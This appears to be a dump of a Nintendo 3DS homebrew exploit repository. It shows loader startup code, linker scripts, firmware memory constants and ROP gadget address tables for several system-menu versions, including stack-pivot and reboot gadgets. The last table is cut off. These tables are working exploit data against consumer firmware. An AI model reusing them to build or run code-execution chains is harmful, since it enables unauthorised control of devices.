├── scripts
    ├── .gitignore
    ├── qrcode.exe
    ├── extractPatch.py
    ├── fixCRRpatch.py
    ├── fixCRO.py
    ├── makePatches.py
    ├── obfuscator5000.py
    ├── buildAll.py
    ├── makeROP.py
    ├── makeHeaders.py
    ├── portRopDb.py
    ├── blowfish.py
    ├── buildVersion.py
    ├── crypt.py
    ├── compress.py
    └── lzss3.py
├── cn_secondary_payload
    ├── build
    │   └── empty
    ├── source
    │   ├── font_bin.h
    │   ├── text.h
    │   ├── crt0.s
    │   ├── text.c
    │   └── font.c
    ├── ccd00.specs
    ├── ccd00.ld
    ├── otherapp.ld
    └── Makefile
├── cn_qr_initial_loader
    ├── JPN
    │   ├── cn_initial
    │   │   ├── .gitignore
    │   │   ├── source
    │   │   │   ├── font_bin.h
    │   │   │   ├── text.h
    │   │   │   ├── crt0.s
    │   │   │   ├── text.c
    │   │   │   ├── main.c
    │   │   │   └── font.c
    │   │   ├── ccd00.specs
    │   │   ├── ccd00.ld
    │   │   └── Makefile
    │   ├── sploit_proto.bin
    │   ├── Makefile
    │   └── sploit.s
    ├── WEST
    │   ├── cn_initial
    │   │   ├── .gitignore
    │   │   ├── source
    │   │   │   ├── font_bin.h
    │   │   │   ├── text.h
    │   │   │   ├── crt0.s
    │   │   │   ├── text.c
    │   │   │   └── main.c
    │   │   ├── ccd00.specs
    │   │   ├── ccd00.ld
    │   │   └── Makefile
    │   ├── sploit_proto.bin
    │   ├── Makefile
    │   └── sploit.s
    └── Makefile
├── cn_constants
    ├── JPN
    │   ├── Makefile
    │   └── constants.txt
    ├── WEST
    │   ├── Makefile
    │   └── constants.txt
    └── Makefile
├── cn_save_initial_loader
    ├── JPN
    │   ├── cn_initial
    │   │   ├── source
    │   │   │   ├── font_bin.h
    │   │   │   ├── text.h
    │   │   │   ├── crt0.s
    │   │   │   ├── text.c
    │   │   │   └── main.c
    │   │   ├── ccd00.specs
    │   │   ├── ccd00.ld
    │   │   └── Makefile
    │   ├── sploit_proto.bin
    │   ├── Makefile
    │   └── sploit.s
    ├── WEST
    │   ├── cn_initial
    │   │   ├── source
    │   │   │   ├── font_bin.h
    │   │   │   ├── text.h
    │   │   │   ├── crt0.s
    │   │   │   ├── text.c
    │   │   │   └── main.c
    │   │   ├── ccd00.specs
    │   │   ├── ccd00.ld
    │   │   └── Makefile
    │   ├── sploit_proto.bin
    │   ├── Makefile
    │   └── sploit.s
    └── Makefile
├── firm_constants
    ├── N3DS
    │   ├── Makefile
    │   └── constants.txt
    ├── POST5
    │   ├── Makefile
    │   └── constants.txt
    ├── PRE5
    │   ├── Makefile
    │   └── constants.txt
    └── Makefile
├── web
    ├── images
    │   ├── pic.png
    │   ├── ninjhax3.png
    │   └── ninjhax3_128.png
    ├── qr_code.php
    ├── hbrew.css
    └── index.html
├── menu_ropdb
    ├── 11272
    │   └── ropdb.txt
    ├── 12288
    │   └── ropdb.txt
    ├── 13330
    │   └── ropdb.txt
    ├── 15360
    │   └── ropdb.txt
    ├── 16404
    │   └── ropdb.txt
    ├── 17415
    │   └── ropdb.txt
    ├── 19456
    │   └── ropdb.txt
    ├── Makefile
    ├── 20480_usa
    │   └── ropdb.txt
    └── 17415_proto
    │   └── ropdb.txt
├── menu_payload
    ├── Makefile
    ├── menu_payload_loadropbin.s
    └── menu_payload_regionfree.s
├── README.md
└── Makefile


/scripts/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/build/empty:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/source/font_bin.h:
--------------------------------------------------------------------------------
1 | extern const u8 font_bin[];


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | *.elf
3 | *.map
4 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | *.elf
3 | *.map
4 | 


--------------------------------------------------------------------------------
/cn_constants/JPN/Makefile:
--------------------------------------------------------------------------------
1 | all: constants.txt
2 | 
3 | constants.txt:
4 | clean:
5 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/font_bin.h:
--------------------------------------------------------------------------------
1 | extern const u8 font_bin[];


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/source/font_bin.h:
--------------------------------------------------------------------------------
1 | extern const u8 font_bin[];


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/source/font_bin.h:
--------------------------------------------------------------------------------
1 | extern const u8 font_bin[];


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/source/font_bin.h:
--------------------------------------------------------------------------------
1 | extern const u8 font_bin[];


--------------------------------------------------------------------------------
/cn_constants/WEST/Makefile:
--------------------------------------------------------------------------------
1 | all: constants.txt
2 | 
3 | constants.txt:
4 | clean:
5 | 


--------------------------------------------------------------------------------
/firm_constants/N3DS/Makefile:
--------------------------------------------------------------------------------
1 | all: constants.txt
2 | 
3 | constants.txt:
4 | clean:
5 | 


--------------------------------------------------------------------------------
/firm_constants/POST5/Makefile:
--------------------------------------------------------------------------------
1 | all: constants.txt
2 | 
3 | constants.txt:
4 | clean:
5 | 


--------------------------------------------------------------------------------
/firm_constants/PRE5/Makefile:
--------------------------------------------------------------------------------
1 | all: constants.txt
2 | 
3 | constants.txt:
4 | clean:
5 | 


--------------------------------------------------------------------------------
/scripts/qrcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/scripts/qrcode.exe


--------------------------------------------------------------------------------
/web/images/pic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/pic.png


--------------------------------------------------------------------------------
/web/images/ninjhax3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/ninjhax3.png


--------------------------------------------------------------------------------
/cn_secondary_payload/ccd00.specs:
--------------------------------------------------------------------------------
1 | %rename link old_link
2 | 
3 | *link:
4 | %(old_link) -T ./ccd00.ld%s
5 | 


--------------------------------------------------------------------------------
/web/images/ninjhax3_128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/ninjhax3_128.png


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/ccd00.specs:
--------------------------------------------------------------------------------
1 | %rename link old_link
2 | 
3 | *link:
4 | %(old_link) -T ./ccd00.ld%s
5 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/ccd00.specs:
--------------------------------------------------------------------------------
1 | %rename link old_link
2 | 
3 | *link:
4 | %(old_link) -T ./ccd00.ld%s
5 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/ccd00.specs:
--------------------------------------------------------------------------------
1 | %rename link old_link
2 | 
3 | *link:
4 | %(old_link) -T ./ccd00.ld%s
5 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/ccd00.specs:
--------------------------------------------------------------------------------
1 | %rename link old_link
2 | 
3 | *link:
4 | %(old_link) -T ./ccd00.ld%s
5 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/sploit_proto.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_qr_initial_loader/JPN/sploit_proto.bin


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/sploit_proto.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_qr_initial_loader/WEST/sploit_proto.bin


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/sploit_proto.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_save_initial_loader/JPN/sploit_proto.bin


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/sploit_proto.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_save_initial_loader/WEST/sploit_proto.bin


--------------------------------------------------------------------------------
/menu_ropdb/Makefile:
--------------------------------------------------------------------------------
1 | all: ropdb.txt
2 | 
3 | clean:
4 | 	@rm -f ropdb.txt
5 | 	@echo "all cleaned up !"
6 | 
7 | ropdb.txt:
8 | 	@cp $(MENUVERSION)/$@ ./
9 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/source/text.h:
--------------------------------------------------------------------------------
1 | #ifndef TEXT_H
2 | #define TEXT_H
3 | 
4 | void drawCharacter(u8* fb, char c, u16 x, u16 y);
5 | void drawString(u8* fb, char* str, u16 x, u16 y);
6 | 
7 | #endif
8 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/text.h:
--------------------------------------------------------------------------------
1 | #ifndef TEXT_H
2 | #define TEXT_H
3 | 
4 | void drawCharacter(u8* fb, char c, u16 x, u16 y);
5 | void drawString(u8* fb, char* str, u16 x, u16 y);
6 | 
7 | #endif
8 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/source/text.h:
--------------------------------------------------------------------------------
1 | #ifndef TEXT_H
2 | #define TEXT_H
3 | 
4 | void drawCharacter(u8* fb, char c, u16 x, u16 y);
5 | void drawString(u8* fb, char* str, u16 x, u16 y);
6 | 
7 | #endif
8 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/source/text.h:
--------------------------------------------------------------------------------
1 | #ifndef TEXT_H
2 | #define TEXT_H
3 | 
4 | void drawCharacter(u8* fb, char c, u16 x, u16 y);
5 | void drawString(u8* fb, char* str, u16 x, u16 y);
6 | 
7 | #endif
8 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/source/text.h:
--------------------------------------------------------------------------------
1 | #ifndef TEXT_H
2 | #define TEXT_H
3 | 
4 | void drawCharacter(u8* fb, char c, u16 x, u16 y);
5 | void drawString(u8* fb, char* str, u16 x, u16 y);
6 | 
7 | #endif
8 | 


--------------------------------------------------------------------------------
/cn_constants/Makefile:
--------------------------------------------------------------------------------
 1 | all: constants.txt
 2 | 
 3 | clean:
 4 | 	@rm -f constants.txt
 5 | 	@cd WEST && make clean
 6 | 	@cd JPN && make clean
 7 | 	@echo "all cleaned up !"
 8 | 
 9 | constants.txt:
10 | 	@cd $(CNVERSION) && make
11 | 	@cp $(CNVERSION)/$@ ./
12 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/ccd00.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	RAMRO (rx) : ORIGIN = 0x00108000, LENGTH = 0x0000A000
 6 | }
 7 | 
 8 | SECTIONS
 9 | {
10 | 	.text : ALIGN(0x1000) {
11 | 		build/crt0.o(.init)
12 | 		*(.text)
13 | 	}
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/otherapp.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	RAMRO (rx) : ORIGIN = 0x00101000, LENGTH = 0x0000A000
 6 | }
 7 | 
 8 | SECTIONS
 9 | {
10 | 	.text : ALIGN(0x1000) {
11 | 		build/crt0.o(.init)
12 | 		*(.text)
13 | 	}
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/firm_constants/Makefile:
--------------------------------------------------------------------------------
 1 | all: constants.txt
 2 | 
 3 | clean:
 4 | 	@rm -f constants.txt
 5 | 	@cd PRE5 && make clean
 6 | 	@cd POST5 && make clean
 7 | 	@cd N3DS && make clean
 8 | 	@echo "all cleaned up !"
 9 | 
10 | constants.txt:
11 | 	@cd $(FIRMVERSION) && make
12 | 	@cp $(FIRMVERSION)/$@ ./
13 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/ccd00.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	RAMX (rx) : ORIGIN = 0x00180000, LENGTH = 0x1000
 6 | }
 7 | 
 8 | SECTIONS
 9 | {
10 | 	/*.text : ALIGN(0x1000) {*/
11 | 	.text : ALIGN(0x100) {
12 | 		build/crt0.o(.init)
13 | 		*(.text)
14 | 		*(.rodata)
15 | 	}
16 | }
17 | 
18 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/ccd00.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	RAMX (rx) : ORIGIN = 0x00180000, LENGTH = 0x1000
 6 | }
 7 | 
 8 | SECTIONS
 9 | {
10 | 	/*.text : ALIGN(0x1000) {*/
11 | 	.text : ALIGN(0x100) {
12 | 		build/crt0.o(.init)
13 | 		*(.text)
14 | 		*(.rodata)
15 | 	}
16 | }
17 | 
18 | 


--------------------------------------------------------------------------------
/firm_constants/N3DS/constants.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | 	("CN_TEXTPAOFFSET", "0x03E00000"),
 3 | 	("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"),
 4 | 	
 5 | 	("FIRM_LINEAROFFSET", "0x10000000"),
 6 | 	("FIRM_APPMEMALLOC", "0x07C00000"),
 7 | 
 8 | 	("FIRM_LINEARSYSTEM", "0x38000000"),
 9 | 
10 | 	("MENU_LOADEDROP_BUFADR", "0x38C40000"),
11 | ]
12 | 


--------------------------------------------------------------------------------
/firm_constants/POST5/constants.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | 	("CN_TEXTPAOFFSET", "0x03E00000"),
 3 | 	("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"),
 4 | 	
 5 | 	("FIRM_LINEAROFFSET", "-0x0C000000"),
 6 | 	("FIRM_APPMEMALLOC", "0x04000000"),
 7 | 
 8 | 	("FIRM_LINEARSYSTEM", "0x34000000"),
 9 | 
10 | 	("MENU_LOADEDROP_BUFADR", "0x35040000"),
11 | ]
12 | 


--------------------------------------------------------------------------------
/firm_constants/PRE5/constants.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | 	("CN_TEXTPAOFFSET", "0x03DBE000"),
 3 | 	("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"),
 4 | 	
 5 | 	("FIRM_LINEAROFFSET", "-0x0C000000"),
 6 | 	("FIRM_APPMEMALLOC", "0x04000000"),
 7 | 
 8 | 	("FIRM_LINEARSYSTEM", "0x34000000"),
 9 | 
10 | 	("MENU_LOADEDROP_BUFADR", "0x35040000"),
11 | ]
12 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/ccd00.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	/*RAMRO (rx) : ORIGIN = 0x00100000, LENGTH = 0x001DA000*/
 6 | 	/*RAMRO (rx) : ORIGIN = 0x002D9000, LENGTH = 0x00001000*/
 7 | 	RAMRO (rx) : ORIGIN = 0x002D9700, LENGTH = 0x00001000
 8 | }
 9 | 
10 | SECTIONS
11 | {
12 | 	/*.text : ALIGN(0x1000) {*/
13 | 	.text : ALIGN(0x100) {
14 | 		build/crt0.o(.init)
15 | 		*(.text)
16 | 		*(.rodata)
17 | 	}
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/ccd00.ld:
--------------------------------------------------------------------------------
 1 | OUTPUT_ARCH(arm)
 2 | 
 3 | MEMORY
 4 | {
 5 | 	/*RAMRO (rx) : ORIGIN = 0x00100000, LENGTH = 0x001DA000*/
 6 | 	/*RAMRO (rx) : ORIGIN = 0x002D9000, LENGTH = 0x00001000*/
 7 | 	RAMRO (rx) : ORIGIN = 0x002D9700, LENGTH = 0x00001000
 8 | }
 9 | 
10 | SECTIONS
11 | {
12 | 	/*.text : ALIGN(0x1000) {*/
13 | 	.text : ALIGN(0x100) {
14 | 		build/crt0.o(.init)
15 | 		*(.text)
16 | 		*(.rodata)
17 | 	}
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/crt0.s:
--------------------------------------------------------------------------------
 1 | .section ".init"
 2 | .arm
 3 | .align 4
 4 | .global _init
 5 | .global _start
 6 | 
 7 | _start:
 8 | 	# blx __libc_init_array
 9 | 	# swi 0xa
10 | 	mov r0, #0
11 | 	mov r1, #0
12 | 	mov r2, #0
13 | 	mov r3, #0
14 | 	mov r4, #0
15 | 	mov r5, #0
16 | 	mov r6, #0
17 | 	mov r7, #0
18 | 	mov r8, #0
19 | 	mov r9, #0
20 | 	mov r10, #0
21 | 	mov r11, #0
22 | 	mov r12, #0
23 | 	mov sp, #0x10000000
24 | 	blx _main
25 | 
26 | _init:
27 | 	bx lr
28 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/source/crt0.s:
--------------------------------------------------------------------------------
 1 | .section ".init"
 2 | .arm
 3 | .align 4
 4 | .global _init
 5 | .global _start
 6 | 
 7 | _start:
 8 | 	# blx __libc_init_array
 9 | 	# swi 0xa
10 | 	mov r0, #0
11 | 	mov r1, #0
12 | 	mov r2, #0
13 | 	mov r3, #0
14 | 	mov r4, #0
15 | 	mov r5, #0
16 | 	mov r6, #0
17 | 	mov r7, #0
18 | 	mov r8, #0
19 | 	mov r9, #0
20 | 	mov r10, #0
21 | 	mov r11, #0
22 | 	mov r12, #0
23 | 	mov sp, #0x10000000
24 | 	blx _main
25 | 
26 | _init:
27 | 	bx lr
28 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/source/crt0.s:
--------------------------------------------------------------------------------
 1 | .section ".init"
 2 | .arm
 3 | .align 4
 4 | .global _init
 5 | .global _start
 6 | 
 7 | _start:
 8 | 	# blx __libc_init_array
 9 | 	# swi 0xa
10 | 	mov r0, #0
11 | 	mov r1, #0
12 | 	mov r2, #0
13 | 	mov r3, #0
14 | 	mov r4, #0
15 | 	mov r5, #0
16 | 	mov r6, #0
17 | 	mov r7, #0
18 | 	mov r8, #0
19 | 	mov r9, #0
20 | 	mov r10, #0
21 | 	mov r11, #0
22 | 	mov r12, #0
23 | 	mov sp, #0x10000000
24 | 	blx _main
25 | 
26 | _init:
27 | 	bx lr
28 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/source/crt0.s:
--------------------------------------------------------------------------------
 1 | .section ".init"
 2 | .arm
 3 | .align 4
 4 | .global _init
 5 | .global _start
 6 | 
 7 | _start:
 8 | 	# blx __libc_init_array
 9 | 	# swi 0xa
10 | 	mov r0, #0
11 | 	mov r1, #0
12 | 	mov r2, #0
13 | 	mov r3, #0
14 | 	mov r4, #0
15 | 	mov r5, #0
16 | 	mov r6, #0
17 | 	mov r7, #0
18 | 	mov r8, #0
19 | 	mov r9, #0
20 | 	mov r10, #0
21 | 	mov r11, #0
22 | 	mov r12, #0
23 | 	mov sp, #0x10000000
24 | 	blx _main
25 | 
26 | _init:
27 | 	bx lr
28 | 


--------------------------------------------------------------------------------
/scripts/extractPatch.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 |  
 3 | def getWord(b, k, n=4):
 4 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 5 | 
 6 | origfn=sys.argv[1]
 7 | patchfn=sys.argv[2]
 8 | outfn=sys.argv[3]
 9 | offset=int(sys.argv[4], 0)
10 | end_offset=int(sys.argv[5], 0)
11 | 
12 | origdata=bytearray(open(origfn,"rb").read())
13 | patchdata=bytearray(open(patchfn,"rb").read())
14 | 
15 | if len(sys.argv)>6:
16 | 	size=int(sys.argv[5], 0)
17 | else:
18 | 	k=end_offset
19 | 	while getWord(origdata,k-4)==getWord(patchdata,k-4):
20 | 		k-=4
21 | 	size=k-offset
22 | 
23 | open(outfn,"wb").write(patchdata[offset:(offset+size)])
24 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/source/crt0.s:
--------------------------------------------------------------------------------
 1 | .section ".init"
 2 | .arm
 3 | .align 4
 4 | .global _init
 5 | .global _start
 6 | 
 7 | _start:
 8 | 	# blx __libc_init_array
 9 | 	# don't clear r0 in order to protect mode arg
10 | 	# mov r0, #0
11 | 	mov r1, #0
12 | 	mov r2, #0
13 | 	mov r3, #0
14 | 	mov r4, #0
15 | 	mov r5, #0
16 | 	mov r6, #0
17 | 	mov r7, #0
18 | 	mov r8, #0
19 | 	mov r9, #0
20 | 	mov r10, #0
21 | 	mov r11, #0
22 | 	mov r12, #0
23 | 	mov sp, #0x10000000
24 | 	push {r0} @ Write r0 to the very top of the stack, so that code elsewhere can load that value globally via a fixed address.
25 | 	blx main
26 | 
27 | _init:
28 | 	bx lr
29 | 


--------------------------------------------------------------------------------
/menu_ropdb/11272/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x102028"),
 3 | ("ROP_MENU_POP_R0PC", "0x157554"),
 4 | ("ROP_MENU_POP_R1PC", "0x2149f0"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x150108"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102468"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x123260"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154e9c"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x122e1c"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x1fc154"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12e64c"),
13 | ("ROP_MENU_NSS_REBOOT", "0x139878"),
14 | ("MENU_NSS_HANDLE", "0x2f1f98"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/12288/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x102028"),
 3 | ("ROP_MENU_POP_R0PC", "0x1575ac"),
 4 | ("ROP_MENU_POP_R1PC", "0x214988"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x150160"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102468"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x123260"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154ef4"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x122e1c"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x1fc0ec"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12e64c"),
13 | ("ROP_MENU_NSS_REBOOT", "0x139878"),
14 | ("MENU_NSS_HANDLE", "0x2f0f98"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/13330/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10203c"),
 3 | ("ROP_MENU_POP_R0PC", "0x154f0c"),
 4 | ("ROP_MENU_POP_R1PC", "0x2262bc"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x1512c4"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102470"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x1235cc"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1525c8"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x123144"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x20a4e8"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b590"),
13 | ("ROP_MENU_NSS_REBOOT", "0x136a10"),
14 | ("MENU_NSS_HANDLE", "0x314018"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/15360/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10203c"),
 3 | ("ROP_MENU_POP_R0PC", "0x154ef0"),
 4 | ("ROP_MENU_POP_R1PC", "0x226264"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x1512b4"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102470"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x1235c0"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1525ac"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x123138"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x20a474"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b584"),
13 | ("ROP_MENU_NSS_REBOOT", "0x136a04"),
14 | ("MENU_NSS_HANDLE", "0x314018"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/16404/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10201c"),
 3 | ("ROP_MENU_POP_R0PC", "0x1576d4"),
 4 | ("ROP_MENU_POP_R1PC", "0x237040"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x1502c8"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f62c"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154fb8"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f1a4"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e7f4"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b0a0"),
13 | ("ROP_MENU_NSS_REBOOT", "0x1373ec"),
14 | ("MENU_NSS_HANDLE", "0x32f048"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/17415/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10201c"),
 3 | ("ROP_MENU_POP_R0PC", "0x157818"),
 4 | ("ROP_MENU_POP_R1PC", "0x236efc"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15040c"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5d0"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1550fc"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f148"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e6cc"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b044"),
13 | ("ROP_MENU_NSS_REBOOT", "0x137390"),
14 | ("MENU_NSS_HANDLE", "0x32e040"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/19456/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10201c"),
 3 | ("ROP_MENU_POP_R0PC", "0x157848"),
 4 | ("ROP_MENU_POP_R1PC", "0x237004"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15043c"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5fc"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x15512c"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f174"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e7d4"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b070"),
13 | ("ROP_MENU_NSS_REBOOT", "0x1373bc"),
14 | ("MENU_NSS_HANDLE", "0x32e040"),
15 | ]
16 | 


--------------------------------------------------------------------------------
/menu_ropdb/20480_usa/ropdb.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | ("ROP_MENU_POP_PC", "0x10201c"),
 3 | ("ROP_MENU_POP_R0PC", "0x157848"),
 4 | ("ROP_MENU_POP_R1PC", "0x236ebc"),
 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15043c"),
 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"),
 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"),
 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5fc"),
 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x15512c"),
10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f174"),
11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e68c"),
12 | ("ROP_MENU_SLEEPTHREAD", "0x12b070"),
13 | ("ROP_MENU_NSS_REBOOT", "0x1373bc"),
